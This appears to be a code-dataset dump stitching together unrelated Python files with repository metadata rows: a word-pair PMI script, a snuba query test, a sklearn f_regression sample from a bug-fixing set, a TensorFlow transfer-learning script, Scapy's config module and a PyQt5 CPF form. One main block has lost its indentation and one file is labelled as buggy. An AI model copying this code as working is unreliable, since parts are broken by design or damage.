        min_dist: minimum distance between the two words of a pair.
        max_dist: maximum distance (inclusive).
        reverse: also count pairs whose second word precedes the first.

    Returns:
        (pair_frequencies, unigram_frequencies) as produced by
        CountDict.get_frequencies (unigrams restricted with limit=10).
    """
    bigram_count_dict = CountDict()
    unigram_count_dict = CountDict()
    n = len(dataset)
    for idx, first_word in enumerate(dataset):
        unigram_count_dict.insert(first_word)
        # Clamp the (exclusive) window end to len(dataset), not
        # len(dataset) - 1: the old bound excluded the final token as a
        # second word, silently dropping e.g. the very last bigram.
        start_pos = min(n, idx + min_dist)
        end_pos = min(n, idx + max_dist + 1)  # +1: make 'max_dist' inclusive
        for next_idx in range(start_pos, end_pos):
            second_word = dataset[next_idx]
            key = first_word + " " + second_word
            bigram_count_dict.insert(key)
        if reverse:
            # Backward window [idx - max_dist, idx - min_dist], clamped at 0.
            start_pos = max(0, idx - min_dist + 1)
            end_pos = max(0, idx - max_dist)
            for next_idx in range(end_pos, start_pos):
                second_word = dataset[next_idx]
                key = first_word + " " + second_word
                bigram_count_dict.insert(key)
    bigram_freq = bigram_count_dict.get_frequencies(len(dataset))
    unigram_freq = unigram_count_dict.get_frequencies(len(dataset), limit=10)
    return bigram_freq, unigram_freq
def compute_pointwise_mu(e, data, reverse=False):
    """Compute pointwise mutual information for word pairs in `data`.

    Args:
        e: experiment dict with 'min_dist' and 'max_dist' keys.
        data: sequence of word tokens.
        reverse: forwarded to compute_counts (also count backward pairs).

    Returns:
        List of ("x1 x2", pmi) tuples sorted by PMI, descending.
    """
    joint_probs, single_probs = compute_counts(data, min_dist=e["min_dist"], max_dist=e["max_dist"], reverse=reverse)
    result = {}
    for key_joint, p_joint in joint_probs.items():
        x1, x2 = key_joint.split(" ")
        # NOTE(review): direct indexing plus the None checks below suggests
        # single_probs yields None for words filtered out by the limit=10
        # threshold rather than raising KeyError -- verify against
        # CountDict.get_frequencies.
        p_x1 = single_probs[x1]
        p_x2 = single_probs[x2]
        if p_x1 is not None and p_x2 is not None:
            # Pointwise mutual information: log2(P(x1,x2) / (P(x1) * P(x2))).
            result[key_joint] = np.log2(p_joint / (p_x1 * p_x2))
    result = [(k, v) for k, v in sorted(result.items(), key=lambda item: item[1], reverse=True)]
    return result
def save_result(res, fname, max_lines=20):
    """Write the top `max_lines` (x1, x2, value) rows of `res` to a CSV file.

    Args:
        res: iterable of ("x1 x2", value) pairs, assumed already sorted.
        fname: output path; missing parent directories are created.
        max_lines: maximum number of data rows to write.
    """
    # Create the parent directory if needed. makedirs(..., exist_ok=True)
    # replaces the old exists()/EEXIST dance, is race-free, and skipping the
    # empty-dirname case also fixes a crash for bare filenames.
    directory = os.path.dirname(fname)
    if directory:
        os.makedirs(directory, exist_ok=True)

    with open(fname, "w") as f:
        f.write("x1,x2,pmu\n")
        for x1x2, v in res:
            max_lines -= 1
            x1, x2 = x1x2.split(" ")
            f.write(x1 + "," + x2 + "," + str(v) + "\n")
            if max_lines == 0:
                break
if __name__ == "__main__":
# DATASETS
dataset_dir = "dataset"
datasets = {"cz": "TEXTCZ1.txt", "en": "TEXTEN1.txt"}
# >>> encode CZ dataset to UTF >>>
path = os.path.join(dataset_dir, datasets["cz"] + "-utf")
if not os.path.isfile(path):
encode_as_utf(os.path.join(dataset_dir, datasets["cz"]))
datasets["cz"] = datasets["cz"] + "-utf"
# <<< encode CZ dataset to UTF <<<
# ... On each dataset ...
experiments = [
{"name": "close", "min_dist": 1, "max_dist": 1, "backward": False},
{"name": "far", "min_dist": 1+1, "max_dist": 50+1, "backward": True},
]
for experiment in experiments:
for lang, fname in datasets.items():
print("Dataset: {}".format(fname))
dataset, _, _ = load_dataset(os.path.join(dataset_dir, fname))
result = compute_pointwise_mu(experiment, dataset, reverse=False)
filename = "friend_results/"+"best_friends_"+lang+"_"+experiment["name"]+".csv"
save_result(result, filename)
if experiment["backward"]:
result = compute_pointwise_mu(experiment, dataset, reverse=True)
filename = "friend_results/" + "best_friends_" + lang + "_" + experiment["name"] + "_reversed" + ".csv"
save_result(result, filename)
| [
"martin.jenc@getmanta.com"
] | martin.jenc@getmanta.com |
6ef6540bd2180186c923cbd1e76bfd2414db3f1d | ec6b94f8fa4558f2156f5cdf1ab0347fb5573241 | /tests/clickhouse/query_dsl/test_project_id.py | ce274c9a8930b4499e68fc3e9dba3946378cca79 | [
"Apache-2.0",
"BUSL-1.1"
] | permissive | pombredanne/snuba | 8e9a55bf38b3ac84407d0c2755e3c0ac226688de | eb1d25bc52320bf57a40fd6efc3da3dd5e9f1612 | refs/heads/master | 2021-08-27T20:55:46.392979 | 2021-08-14T08:21:47 | 2021-08-14T08:21:47 | 171,631,594 | 0 | 0 | Apache-2.0 | 2020-01-10T10:42:17 | 2019-02-20T08:26:17 | Python | UTF-8 | Python | false | false | 4,583 | py | from typing import Any, MutableMapping, Set
import pytest
from snuba.clickhouse.query_dsl.accessors import get_object_ids_in_query_ast
from snuba.datasets.factory import get_dataset
from snuba.datasets.plans.translator.query import identity_translate
from snuba.query.parser import parse_query
test_cases = [
(
{"selected_columns": ["column1"], "conditions": [["project_id", "=", 100]]},
{100},
), # Simple single project condition
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", [100, 200, 300]]],
},
{100, 200, 300},
), # Multiple projects in the query
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", (100, 200, 300)]],
},
{100, 200, 300},
), # Multiple projects in the query provided as tuple
(
{"selected_columns": ["column1"], "conditions": []},
None,
), # No project condition
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
],
},
{300},
), # Multiple project conditions, intersected together
(
{
"selected_columns": ["column1"],
"conditions": [
[
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
]
],
},
{100, 200, 300, 400, 500},
), # Multiple project conditions, in union
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "=", 400],
],
},
set(),
), # A fairly stupid query
(
{
"selected_columns": ["column1"],
"conditions": [
["column1", "=", "something"],
[["ifNull", ["column2", 0]], "=", 1],
["project_id", "IN", [100, 200, 300]],
[("count", ["column3"]), "=", 10],
["project_id", "=", 100],
],
},
{100},
), # Multiple conditions in AND. Two project conditions
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[["project_id", "=", 100], ["project_id", "=", 200]],
],
},
{100, 200},
), # Main project list in a conditions and multiple project conditions in OR
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[
[["ifNull", ["project_id", 1000]], "=", 100],
[("count", ["column3"]), "=", 10],
[["ifNull", ["project_id", 1000]], "=", 200],
],
],
},
{100, 200, 300},
), # Main project list in a conditions and multiple project conditions within unsupported function calls
(
{
"selected_columns": ["column1"],
"conditions": [
[
[
"and",
[
["equals", ["project_id", 100]],
["equals", ["column1", "'something'"]],
],
],
"=",
1,
],
[
[
"and",
[
["equals", ["project_id", 200]],
["equals", ["column3", "'something_else'"]],
],
],
"=",
1,
],
],
},
None,
), # project_id in unsupported functions (cannot navigate into an "and" function)
# TODO: make this work as it should through the AST.
]
@pytest.mark.parametrize("query_body, expected_projects", test_cases)
def test_find_projects(
query_body: MutableMapping[str, Any], expected_projects: Set[int]
) -> None:
events = get_dataset("events")
query = identity_translate(parse_query(query_body, events))
project_ids_ast = get_object_ids_in_query_ast(query, "project_id")
assert project_ids_ast == expected_projects
| [
"noreply@github.com"
] | noreply@github.com |
fee6c4374d7d6e9eceaa09cf64c3bf93594efe6c | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/9960b43c9cc1e2a2e58da7952283f93d09a1fdc0-<f_regression>-bug.py | 1f2d5280f165e64d4a762027a36feb370bb04cf1 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,406 | py |
def f_regression(X, y, center=True):
'Univariate linear regression tests.\n\n Linear model for testing the individual effect of each of many regressors.\n This is a scoring function to be used in a feature seletion procedure, not\n a free standing feature selection procedure.\n\n This is done in 2 steps:\n\n 1. The correlation between each regressor and the target is computed,\n that is, ((X[:, i] - mean(X[:, i])) * (y - mean_y)) / (std(X[:, i]) *\n std(y)).\n 2. It is converted to an F score then to a p-value.\n\n For more on usage see the :ref:`User Guide <univariate_feature_selection>`.\n\n Parameters\n ----------\n X : {array-like, sparse matrix} shape = (n_samples, n_features)\n The set of regressors that will be tested sequentially.\n\n y : array of shape(n_samples).\n The data matrix\n\n center : True, bool,\n If true, X and y will be centered.\n\n Returns\n -------\n F : array, shape=(n_features,)\n F values of features.\n\n pval : array, shape=(n_features,)\n p-values of F-scores.\n\n\n See also\n --------\n mutual_info_regression: Mutual information for a continuous target.\n f_classif: ANOVA F-value between label/feature for classification tasks.\n chi2: Chi-squared stats of non-negative features for classification tasks.\n SelectKBest: Select features based on the k highest scores.\n SelectFpr: Select features based on a false positive rate test.\n SelectFdr: Select features based on an estimated false discovery rate.\n SelectFwe: Select features based on family-wise error rate.\n SelectPercentile: Select features based on percentile of the highest\n scores.\n '
(X, y) = check_X_y(X, y, ['csr', 'csc', 'coo'], dtype=np.float64)
n_samples = X.shape[0]
if center:
y = (y - np.mean(y))
if issparse(X):
X_means = X.mean(axis=0).getA1()
else:
X_means = X.mean(axis=0)
X_norms = np.sqrt((row_norms(X.T, squared=True) - (n_samples * (X_means ** 2))))
else:
X_norms = row_norms(X.T)
corr = safe_sparse_dot(y, X)
corr /= X_norms
corr /= np.linalg.norm(y)
degrees_of_freedom = (y.size - (2 if center else 1))
F = (((corr ** 2) / (1 - (corr ** 2))) * degrees_of_freedom)
pv = stats.f.sf(F, 1, degrees_of_freedom)
return (F, pv)
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
51e2a1aef863002583ef59c35412aaf0cd607aec | 465192ba0485123e7b87f0a2636fadd343fd4723 | /transfer.py | a07ce47e8ea029b4c361aa903b95183604c3696e | [] | no_license | sunset233/FringerprintCode | 05cc519eb6fc36abdaa607d07b778f4925c76767 | 88342bcd9b5bd3b7e9d93ff812567c2d6596a771 | refs/heads/master | 2022-06-28T14:48:25.248197 | 2020-05-09T14:43:55 | 2020-05-09T14:43:55 | 257,637,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,857 | py | import matplotlib
from matplotlib import pyplot as plt
# Global matplotlib defaults: bigger fonts / figure for the accuracy plot below.
matplotlib.rcParams['font.size'] = 18
matplotlib.rcParams['figure.titlesize'] = 18
matplotlib.rcParams['figure.figsize'] = [9, 7]
# KaiTi renders the Chinese legend/axis labels used below; keep ASCII minus
# signs so negative tick labels still display with a CJK font.
matplotlib.rcParams['font.family'] = ['KaiTi']
matplotlib.rcParams['axes.unicode_minus']=False
import os
import tensorflow as tf
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers,optimizers,losses
from tensorflow.keras.callbacks import EarlyStopping
# Fix RNG seeds for reproducibility and silence TF info/warning logs.
tf.random.set_seed(1234)
np.random.seed(1234)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
assert tf.__version__.startswith('2.')  # script uses TF2-only APIs
from data_loading import load_nist,normalize
def preprocess(x,y):
    """Load one fingerprint image and one-hot encode its label.

    x: path to the image file on disk; y: integer class index in [0, 10).
    Returns (augmented image tensor, one-hot label of depth 10).
    """
    x = tf.io.read_file(x)
    x = tf.image.decode_jpeg(x, channels=3)  # decode as 3-channel RGB
    x = tf.image.resize(x, [244, 244])
    # Light augmentation: random flips, then a random 224x224 crop
    # out of the 244x244 resized image.
    x = tf.image.random_flip_left_right(x)
    x = tf.image.random_flip_up_down(x)
    x = tf.image.random_crop(x, [224,224,3])
    # Scale [0,255] bytes to [0,1] floats, then apply the project's
    # normalize() (presumably channel mean/std — see data_loading).
    x = tf.cast(x, dtype=tf.float32) / 255.
    x = normalize(x)
    y = tf.convert_to_tensor(y)
    y = tf.one_hot(y, depth=10)
    return x, y
batchsz = 32
# Build the training Dataset object from the NIST fingerprint data.
images, labels, table = load_nist('nist',mode='train')
db_train = tf.data.Dataset.from_tensor_slices((images, labels))
db_train = db_train.shuffle(1000).map(preprocess).batch(batchsz)
# Load DenseNet169 pretrained on ImageNet, dropping the top FC classifier
# and using global max pooling as the final layer.
net = tf.keras.applications.DenseNet169(weights = 'imagenet', include_top=False, pooling='max')
# Freeze the backbone: its weights do not participate in optimization.
net.trainable = False
newnet = keras.Sequential([
    net, # frozen DenseNet169 feature extractor (top removed)
    layers.Dense(1024, activation='relu'), # new fully-connected layer
    layers.BatchNormalization(), # batch-norm layer
    layers.Dropout(rate=0.5), # dropout to curb overfitting
    layers.Dense(10) # 10 output logits, one per fingerprint class
])
newnet.build(input_shape=(4,224,224,3))
newnet.summary()
# Early stopping: terminate once accuracy fails to improve by min_delta
# for 3 consecutive epochs.
early_stopping = EarlyStopping(
    monitor='accuracy',
    min_delta=0.0001,
    patience=3
)
newnet.compile(optimizer=optimizers.Adam(lr=1e-3),
               loss=losses.CategoricalCrossentropy(from_logits=True),
               metrics=['accuracy'])
history = newnet.fit(db_train, epochs=100,
                    callbacks=[early_stopping])
newnet.save('model.h5')
history = history.history
print(history.keys())
print(history['accuracy'])
# Plot training accuracy: a line plus square markers over the same series.
plt.figure()
returns = history['accuracy']
plt.plot(np.arange(len(returns)), returns, label='训练准确率')
plt.plot(np.arange(len(returns)), returns, 's')
plt.legend()
plt.xlabel('Epoch')
plt.ylabel('准确率')
plt.savefig('scratch.svg') | [
"786678906@qq.com"
] | 786678906@qq.com |
a4dfd68fde668dcfdee308b7d26cd714302bba38 | a4b185c5a7d5e386c3b8f738a3e79257e36fd015 | /scapy/config.py | 836de46831e7b8c5c4d2bf0d525aa704af0a77c1 | [] | no_license | sh0wrun/scapy | d640dccc22ebf04510fcf3406e88ffcce6da5f9b | 2adc641a37022b267275eb41330a0bbf9b683d21 | refs/heads/master | 2021-01-01T20:16:11.995257 | 2013-01-13T05:34:29 | 2013-01-13T05:34:29 | 12,031,321 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,032 | py | ## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Implementation for of the configuration object.
"""
import os,time,socket,sys
from data import *
import base_classes
import themes
from error import log_scapy
############
## Config ##
############
class ConfClass(object):
    """Base class for Scapy configuration objects.

    Instances pretty-print their public (non-underscore) attributes as an
    aligned "name = value" table, truncating long values with "...".
    """
    def configure(self, cnf):
        # Adopt a shallow copy of another instance's attribute dict.
        self.__dict__ = cnf.__dict__.copy()
    def __repr__(self):
        return str(self)
    def __str__(self):
        s=""
        # Merge class-level defaults with instance overrides.
        keys = self.__class__.__dict__.copy()
        keys.update(self.__dict__)
        keys = keys.keys()
        keys.sort()  # Python 2: dict.keys() returns a sortable list
        for i in keys:
            if i[0] != "_":  # skip private/dunder attributes
                r = repr(getattr(self, i))
                r = " ".join(r.split())  # collapse whitespace/newlines
                wlen = 76-max(len(i),10)
                if len(r) > wlen:
                    r = r[:wlen-3]+"..."
                s += "%-10s = %s\n" % (i, r)
        return s[:-1]  # drop the trailing newline
class Interceptor(object):
    """Data descriptor that fires a hook callback on every assignment.

    The value is stored per-owner-object under "_intercepted_<name>";
    reads lazily install the default the first time.
    """
    def __init__(self, name, default, hook, args=None, kargs=None):
        self.name = name
        self.intname = "_intercepted_%s" % name
        self.default=default
        self.hook = hook
        self.args = args if args is not None else []
        self.kargs = kargs if kargs is not None else {}
    def __get__(self, obj, typ=None):
        if not hasattr(obj, self.intname):
            setattr(obj, self.intname, self.default)
        return getattr(obj, self.intname)
    def __set__(self, obj, val):
        # Store first, then notify: the hook sees the new value in place.
        setattr(obj, self.intname, val)
        self.hook(self.name, val, *self.args, **self.kargs)
class ProgPath(ConfClass):
    """Names/paths of the external programs Scapy shells out to."""
    pdfreader = "acroread"
    psreader = "gv"
    dot = "dot"
    display = "display"
    tcpdump = "tcpdump"
    tcpreplay = "tcpreplay"
    hexedit = "hexer"
    wireshark = "wireshark"
class ConfigFieldList:
    """Set of packet fields plus the layer classes that own them.

    Base for conf.emph / conf.resolve style lists; membership tests work
    for both a field object and a layer class.
    """
    def __init__(self):
        self.fields = set()
        self.layers = set()
    @staticmethod
    def _is_field(f):
        # A "field" is anything that records its owner layers.
        return hasattr(f, "owners")
    def _recalc_layer_list(self):
        # Keep self.layers in sync: the union of all fields' owners.
        self.layers = set([owner for f in self.fields for owner in f.owners])
    def add(self, *flds):
        # Non-field arguments are silently ignored.
        self.fields |= set([f for f in flds if self._is_field(f)])
        self._recalc_layer_list()
    def remove(self, *flds):
        self.fields -= set(flds)
        self._recalc_layer_list()
    def __contains__(self, elt):
        # Dispatch on type: layer classes test the layer set, fields the field set.
        if isinstance(elt, base_classes.Packet_metaclass):
            return elt in self.layers
        return elt in self.fields
    def __repr__(self):
        return "<%s [%s]>" % (self.__class__.__name__," ".join(str(x) for x in self.fields))
class Emphasize(ConfigFieldList):
    """Field list used for conf.emph (fields to emphasize when displaying)."""
    pass
class Resolve(ConfigFieldList):
    """Field list used for conf.resolve / conf.noenum (name resolution)."""
    pass
class Num2Layer:
    """Two-way mapping between protocol numbers and packet layer classes.

    Lookups dispatch on argument type: a layer class maps to its number,
    anything else is treated as a number and maps to a layer class.
    Entries may be registered in one direction only.
    """
    def __init__(self):
        self.num2layer = {}
        self.layer2num = {}
    def register(self, num, layer):
        # Register the association in both directions.
        self.register_num2layer(num, layer)
        self.register_layer2num(num, layer)
    def register_num2layer(self, num, layer):
        self.num2layer[num] = layer
    def register_layer2num(self, num, layer):
        self.layer2num[layer] = num
    def __getitem__(self, item):
        if isinstance(item, base_classes.Packet_metaclass):
            return self.layer2num[item]
        return self.num2layer[item]
    def __contains__(self, item):
        if isinstance(item, base_classes.Packet_metaclass):
            return item in self.layer2num
        return item in self.num2layer
    def get(self, item, default=None):
        if item in self:
            return self[item]
        return default
    def __repr__(self):
        # Dump all mappings sorted by number, marking symmetric entries
        # with <-> and one-way ones with -> or <-.  (iteritems: Python 2)
        lst = []
        for num,layer in self.num2layer.iteritems():
            if layer in self.layer2num and self.layer2num[layer] == num:
                dir = "<->"
            else:
                dir = " ->"
            lst.append((num,"%#6x %s %-20s (%s)" % (num,dir,layer.__name__,layer.name)))
        for layer,num in self.layer2num.iteritems():
            if num not in self.num2layer or self.num2layer[num] != layer:
                lst.append((num,"%#6x <- %-20s (%s)" % (num,layer.__name__,layer.name)))
        lst.sort()
        return "\n".join(y for x,y in lst)
class LayersList(list):
    """List of loaded layer classes; repr shows one "ClassName: name" per line."""
    def __repr__(self):
        s=[]
        for l in self:
            s.append("%-20s: %s" % (l.__name__,l.name))
        return "\n".join(s)
    def register(self, layer):
        self.append(layer)
class CommandsList(list):
    """List of user commands; repr shows each with its docstring's first line."""
    def __repr__(self):
        s=[]
        for l in sorted(self,key=lambda x:x.__name__):
            if l.__doc__:
                doc = l.__doc__.split("\n")[0]
            else:
                doc = "--"  # placeholder for undocumented commands
            s.append("%-20s: %s" % (l.__name__,doc))
        return "\n".join(s)
    def register(self, cmd):
        self.append(cmd)
        return cmd # return cmd so that method can be used as a decorator
def lsc():
    """Print the list of registered user commands (conf.commands)."""
    print repr(conf.commands)
class CacheInstance(dict):
    """A dict whose entries can expire.

    With timeout=None it behaves like a plain dict.  With a timeout (in
    seconds), entries older than the timeout are treated as absent: lookups
    raise KeyError and all iteration/len methods filter them out.  Expired
    entries are never physically removed, only hidden.
    """
    def __init__(self, name="noname", timeout=None):
        self.timeout = timeout
        self.name = name
        # item -> insertion timestamp (time.time()), used for expiry checks
        self._timetable = {}
    def __getitem__(self, item):
        val = dict.__getitem__(self,item)
        if self.timeout is not None:
            t = self._timetable[item]
            if time.time()-t > self.timeout:
                # Stale entry: pretend it does not exist.
                raise KeyError(item)
        return val
    def get(self, item, default=None):
        # overloading this method is needed to force the dict to go through
        # the timetable check
        try:
            return self[item]
        except KeyError:
            return default
    def __setitem__(self, item, v):
        # Record (or refresh) the timestamp on every store.
        self._timetable[item] = time.time()
        dict.__setitem__(self, item,v)
    def update(self, other):
        # NOTE: `other` must be another CacheInstance (needs _timetable).
        dict.update(self, other)
        self._timetable.update(other._timetable)
    def iteritems(self):
        if self.timeout is None:
            return dict.iteritems(self)
        t0=time.time()
        return ((k,v) for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout)
    def iterkeys(self):
        if self.timeout is None:
            return dict.iterkeys(self)
        t0=time.time()
        return (k for k in dict.iterkeys(self) if t0-self._timetable[k] < self.timeout)
    def __iter__(self):
        return self.iterkeys()
    def itervalues(self):
        if self.timeout is None:
            return dict.itervalues(self)
        t0=time.time()
        return (v for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout)
    def items(self):
        if self.timeout is None:
            return dict.items(self)
        t0=time.time()
        return [(k,v) for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout]
    def keys(self):
        if self.timeout is None:
            return dict.keys(self)
        t0=time.time()
        return [k for k in dict.iterkeys(self) if t0-self._timetable[k] < self.timeout]
    def values(self):
        if self.timeout is None:
            return dict.values(self)
        t0=time.time()
        return [v for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout]
    def __len__(self):
        if self.timeout is None:
            return dict.__len__(self)
        # Count only non-expired entries.
        return len(self.keys())
    def summary(self):
        return "%s: %i valid items. Timeout=%rs" % (self.name, len(self), self.timeout)
    def __repr__(self):
        # Aligned "key value" dump of the non-expired entries.
        s = []
        if self:
            mk = max(len(k) for k in self.iterkeys())
            fmt = "%%-%is %%s" % (mk+1)
            for item in self.iteritems():
                s.append(fmt % item)
        return "\n".join(s)
class NetCache:
    """Container of named CacheInstance objects, exposed as attributes."""
    def __init__(self):
        self._caches_list = []
    def add_cache(self, cache):
        # The cache is reachable both from the list and as self.<name>.
        self._caches_list.append(cache)
        setattr(self,cache.name,cache)
    def new_cache(self, name, timeout=None):
        c = CacheInstance(name=name, timeout=timeout)
        self.add_cache(c)
    def __delattr__(self, attr):
        raise AttributeError("Cannot delete attributes")
    def update(self, other):
        for co in other._caches_list:
            if hasattr(self, co.name):
                getattr(self,co.name).update(co)
            else:
                # NOTE(review): dict.copy() returns a plain dict with no
                # .name/_timetable, so add_cache(co.copy()) looks broken
                # for missing caches -- confirm against upstream scapy.
                self.add_cache(co.copy())
    def flush(self):
        # NOTE(review): CacheInstance defines no flush(); calling this
        # would raise AttributeError -- confirm intended behaviour.
        for c in self._caches_list:
            c.flush()
    def __repr__(self):
        return "\n".join(c.summary() for c in self._caches_list)
class LogLevel(object):
    """Descriptor that mirrors assignments into the scapy logger's level."""
    def __get__(self, obj, otype):
        return obj._logLevel
    def __set__(self,obj,val):
        # Keep the logging module in sync with conf.logLevel.
        log_scapy.setLevel(val)
        obj._logLevel = val
def _prompt_changer(attr,val):
    """Interceptor hook for conf.color_theme: recolor sys.ps1 with the theme.

    attr/val come from the descriptor protocol (attribute name, new theme).
    NOTE(review): AnsiColorTheme is not imported in this module (only
    `import themes`); if it is unbound, the bare except below silently
    swallows the NameError and the theme is never applied -- confirm.
    """
    prompt = conf.prompt
    try:
        ct = val
        if isinstance(ct, AnsiColorTheme) and ct.prompt(""):
            ## ^A and ^B delimit invisible caracters for readline to count right.
            ## And we need ct.prompt() to do change something or else ^A and ^B will be
            ## displayed
            prompt = "\001%s\002" % ct.prompt("\002"+prompt+"\001")
        else:
            prompt = ct.prompt(prompt)
    except:
        # Best effort: a broken theme must never take down the session.
        pass
    sys.ps1 = prompt
class Conf(ConfClass):
    """This object contains the configuration of scapy.
session  : filename where the session will be saved
interactive_shell : If set to "ipython", use IPython as shell. Default: Python
stealth  : if 1, prevents any unwanted packet to go out (ARP, DNS, ...)
checkIPID: if 0, doesn't check that IPID matches between IP sent and ICMP IP citation received
           if 1, checks that they either are equal or byte swapped equals (bug in some IP stacks)
           if 2, strictly checks that they are equals
checkIPsrc: if 1, checks IP src in IP and ICMP IP citation match (bug in some NAT stacks)
check_TCPerror_seqack: if 1, also check that TCP seq and ack match the ones in ICMP citation
iff      : selects the default output interface for srp() and sendp(). default:"eth0")
verb     : level of verbosity, from 0 (almost mute) to 3 (verbose)
promisc  : default mode for listening socket (to get answers if you spoof on a lan)
sniff_promisc : default mode for sniff()
filter   : bpf filter added to every sniffing socket to exclude traffic from analysis
histfile : history file
padding  : includes padding in desassembled packets
except_filter : BPF filter for packets to ignore
debug_match : when 1, store received packet that are not matched into debug.recv
route    : holds the Scapy routing table and provides methods to manipulate it
warning_threshold : how much time between warnings from the same place
ASN1_default_codec: Codec used by default for ASN1 objects
mib      : holds MIB direct access dictionnary
resolve  : holds list of fields for which resolution should be done
noenum   : holds list of enum fields for which conversion to string should NOT be done
AS_resolver: choose the AS resolver class to use
extensions_paths: path or list of paths where extensions are to be looked for
"""
    version = "2.2.0-dev"
    session = ""
    interactive = False
    interactive_shell = ""
    stealth = "not implemented"
    iface = None
    readfunc = None
    layers = LayersList()
    commands = CommandsList()
    logLevel = LogLevel()  # descriptor: assignments also update log_scapy
    checkIPID = 0
    checkIPsrc = 1
    checkIPaddr = 1
    check_TCPerror_seqack = 0
    verb = 2
    prompt = ">>> "
    promisc = 1
    sniff_promisc = 1
    raw_layer = None
    raw_summary = False
    default_l2 = None
    l2types = Num2Layer()
    l3types = Num2Layer()
    L3socket = None
    L2socket = None
    L2listen = None
    histfile = os.path.join(os.path.expanduser("~"), ".scapy_history")
    padding = 1
    except_filter = ""
    debug_match = 0
    wepkey = ""
    route = None # Filed by route.py
    route6 = None # Filed by route6.py
    auto_fragment = 1
    debug_dissector = 0
    # Interceptor descriptor: re-renders sys.ps1 via _prompt_changer on assignment.
    color_theme = Interceptor("color_theme", themes.NoTheme(), _prompt_changer)
    warning_threshold = 5
    prog = ProgPath()
    resolve = Resolve()
    noenum = Resolve()
    emph = Emphasize()
    use_pcap = False
    use_dnet = False
    ipv6_enabled = socket.has_ipv6
    ethertypes = ETHER_TYPES
    protocols = IP_PROTOS
    services_tcp = TCP_SERVICES
    services_udp = UDP_SERVICES
    extensions_paths = "."
    manufdb = MANUFDB
    stats_classic_protocols = []
    stats_dot11_protocols = []
    temp_files = []
    netcache = NetCache()
    # Layer modules imported by default at startup.
    load_layers = ["l2", "inet", "dhcp", "dns", "dot11", "gprs", "hsrp", "inet6", "ir", "isakmp", "l2tp",
                   "mgcp", "mobileip", "netbios", "netflow", "ntp", "ppp", "radius", "rip", "rtp",
                   "sebek", "skinny", "smb", "snmp", "tftp", "x509", "bluetooth", "dhcp6", "llmnr", "sctp", "vrrp" ]
# Drop the IPv6 layer modules from the default load list when the running
# Python interpreter was built without IPv6 support.
if not Conf.ipv6_enabled:
    log_scapy.warning("IPv6 support disabled in Python. Cannot load scapy IPv6 layers.")
    for m in ["inet6","dhcp6"]:
        if m in Conf.load_layers:
            Conf.load_layers.remove(m)
# Module-level singleton configuration used throughout Scapy.
conf=Conf()
conf.logLevel=30 # 30=Warning
| [
"db@d1b.org"
] | db@d1b.org |
b41f6497620dac2bc9d6fd9ccbf1f73d47a95d85 | a14251a744f54752608d458addb4c4bccaac40d1 | /design.py | b1e12dd8f7d74796b5630555affc095c0bfdcb99 | [] | no_license | menardiluis/valida-cria-cpf | 488285520c80aae45b0cdda78ccf0a33dd8f62ea | 59086634030563e1ce002d83427483d21cb53180 | refs/heads/master | 2022-10-01T12:49:35.712640 | 2020-06-12T15:30:57 | 2020-06-12T15:30:57 | 271,826,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,086 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'design.ui'
#
# Created by: PyQt5 UI code generator 5.14.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_mainWindow(object):
    """UI scaffold generated by pyuic5 from design.ui.

    Per the header warning, hand edits are lost on regeneration; change
    design.ui and re-run pyuic5 instead.  Widgets: an input line plus
    "Validar"/"Gerar" buttons and a result label (labelRetorno).
    """
    def setupUi(self, mainWindow):
        """Create and lay out all widgets on the given QMainWindow."""
        mainWindow.setObjectName("mainWindow")
        mainWindow.resize(517, 149)
        self.centralwidget = QtWidgets.QWidget(mainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName("gridLayout")
        # Row 0: "Validar CPF" label, input field, validate button.
        self.label_2 = QtWidgets.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setFamily("MS Reference Sans Serif")
        font.setPointSize(12)
        font.setBold(False)
        font.setWeight(50)
        self.label_2.setFont(font)
        self.label_2.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
        self.label_2.setObjectName("label_2")
        self.gridLayout.addWidget(self.label_2, 0, 0, 1, 1)
        self.inputValidaCpf = QtWidgets.QLineEdit(self.centralwidget)
        font = QtGui.QFont()
        font.setFamily("MS Reference Sans Serif")
        font.setPointSize(12)
        font.setBold(False)
        font.setWeight(50)
        self.inputValidaCpf.setFont(font)
        self.inputValidaCpf.setObjectName("inputValidaCpf")
        self.gridLayout.addWidget(self.inputValidaCpf, 0, 1, 1, 1)
        self.btnValidaCpf = QtWidgets.QPushButton(self.centralwidget)
